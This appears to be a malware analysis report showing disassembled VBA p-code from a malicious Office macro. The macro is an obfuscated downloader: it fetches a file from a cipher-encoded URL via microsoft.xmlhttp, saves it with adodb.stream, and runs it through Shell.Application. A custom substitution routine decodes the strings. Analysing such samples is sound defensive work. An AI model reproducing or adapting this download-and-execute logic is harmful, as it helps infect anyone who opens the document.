' 	VarDefn ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨
' Line #10:
' 	Dim 
' 	VarDefn ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º
' Line #11:
' 	Dim 
' 	VarDefn ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿
' Line #12:
' 	Dim 
' 	VarDefn ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´
' Line #13:
' 	Dim 
' 	VarDefn ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ (As Integer)
' Line #14:
' 	Dim 
' 	VarDefn ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³
' Line #15:
' 	Dim 
' 	VarDefn ¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹
' Line #16:
' 	LitDI2 0x0001 
' 	St ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ 
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' 	SetStmt 
' 	LitStr 0x0011 "microsoft.xmlhttp"
' 	ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 
' 	Set ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ 
' Line #22:
' 	SetStmt 
' 	LitStr 0x0011 "Shell.Application"
' 	ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 
' 	Set ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ 
' Line #23:
' Line #24:
' 	Ld id_02A0 
' 	LitStr 0x000C "\å¶ãKK§Ú.ÂÛÂ"
' 	ArgsLd º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ 0x0001 
' 	Add 
' 	St ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ 
' Line #25:
' 	LitStr 0x0003 "get"
' 	LitStr 0x0034 "hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"
' 	ArgsLd º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ 0x0001 
' 	LitVarSpecial (False)
' 	Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ 
' 	ArgsMemCall Open 0x0003 
' Line #26:
' 	Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ 
' 	ArgsMemCall ¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸ 0x0000 
' Line #27:
' 	Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ 
' 	MemLd ¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½º´©¤£¤¢ 
' 	St ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ 
' Line #28:
' 	Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ 
' 	MemLd ª¯ª¸¿¿¦¤¢§¸¯¼³¨¦¶¨¦³¹©¢©½¡¼»£®¤«©¶©£¦µ³¯¢½¹¶½¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§ 
' 	LitDI2 0x00C8 
' 	Eq 
' 	IfBlock 
' Line #29:
' 	SetStmt 
' 	LitStr 0x000C "adodb.stream"
' 	ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 
' 	Set ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' Line #30:
' 	Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' 	ArgsMemCall Open 0x0000 
' Line #31:
' 	Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ 
' 	Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' 	MemSt Type 
' Line #32:
' 	Ld ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ 
' 	Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' 	ArgsMemCall Xor 0x0001 
' Line #33:
' 	Ld ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ 
' 	Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ 
' 	Ld ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ 
' 	Add 
' 	Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' 	ArgsMemCall i 0x0002 
' Line #34:
' 	Ld ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ 
' 	ArgsMemCall Close 0x0000 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	Ld ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ 
' 	Paren 
' 	Ld ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ 
' 	ArgsMemCall Open 0x0001 
' Line #37:
' 	EndSub 
' Line #38:
' Line #39:
' 	FuncDefn (Public Function º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ(¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸, id_FFFE As Variant))
' Line #40:
' 	LitStr 0x006E " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
' 	St ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« 
' Line #41:
' 	LitStr 0x006E " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
' 	St oSpecialPathnhbjkj 
' Line #42:
' 	StartForVariable 
' 	Ld Document 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ 
' 	FnLen 
' 	For 
' Line #43:
' 	Ld ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« 
' 	Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ 
' 	Ld Document 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	FnInStr 
' 	St id_029A 
' Line #44:
' 	Ld id_029A 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #45:
' 	Ld oSpecialPathnhbjkj 
' 	Ld id_029A 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St id_029C 
' Line #46:
' 	Ld id_029E 
' 	Ld id_029C 
' 	Add 
' 	St id_029E 
' Line #47:
' 	ElseBlock 
' Line #48:
' 	Ld id_029E 
' 	Ld ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ 
' 	Ld Document 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Add 
' 	St id_029E 
' Line #49:
' 	EndIfBlock 
' Line #50:
' 	StartForVariable 
' 	Next 
' Line #51:
' 	Ld id_029E 
' 	St º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ 
' Line #52:
' 	EndFunc

Open this report in the interactive analyzer, or submit your own file for analysis.